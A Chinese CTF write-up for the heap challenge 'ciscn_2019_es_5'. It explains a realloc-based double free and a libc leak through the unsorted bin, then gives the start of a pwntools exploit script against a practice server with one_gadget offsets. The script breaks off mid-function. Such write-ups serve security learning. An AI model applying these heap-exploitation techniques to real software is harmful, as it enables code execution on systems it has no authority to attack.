目录
ciscn_2019_es_5(realloc double free)
申请没有大小限制,数目上限为10
edit会调用realloc重新申请(其实不会的,因为大小不变)
如果edit就不能show了
看了一下这题没有什么明显漏洞,但是考虑到realloc这里比较特别,这里再贴一下realloc用法
:
size == 0 ,这个时候等同于free
realloc_ptr == 0 && size > 0 , 这个时候等同于malloc
malloc_usable_size(realloc_ptr) >= size, 这个时候等同于edit
malloc_usable_size(realloc_ptr) < szie, 这个时候才是malloc一块更大的内存,将原来的内容复制过去,再将原来的chunk给free掉
如果我们malloc(0),内存管理器仍然会给我们一个0x20大小的chunk,但是如果到了realloc它就会被释放了,然后我们再delete它就造成了double free
然后就是泄露libc,因为没有大小限制,我们申请一个大一点的chunk,释放后进入unsorted bin,然后malloc(8),这样会切割unsorted bin,之后show()就能泄露main_arena+1168的地址了
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 28564)
#r = process("./ciscn_2019_es_5")
context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *$rebase(0x103B)
x/10gx $rebase(0x202060)
c
''')
elf = ELF("./ciscn_2019_es_5")
libc = ELF('./libc/libc-2.27.so')
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]
menu = "Your choice:"
def add(size, content):
r.recvuntil(menu)
r.sendline('1')
r.recvuntil("size?>")
r.sendline(str(size))
r.recvuntil("content:")
r.sendline(content)
def delete(index):
r.recvuntil(menu)
r.sendline('4')
r.recvuntil("Index:")
r.sendline(str(index))
def show(index):
r.recvuntil(menu)
r.sendline('3')
r.recvuntil("Index:")
r.sendline(str(index))
def edit(index, content, re=True):
r.recvuntil(menu)
r.sendline('2')
r.recvuntil("Index:")
r.sendline(str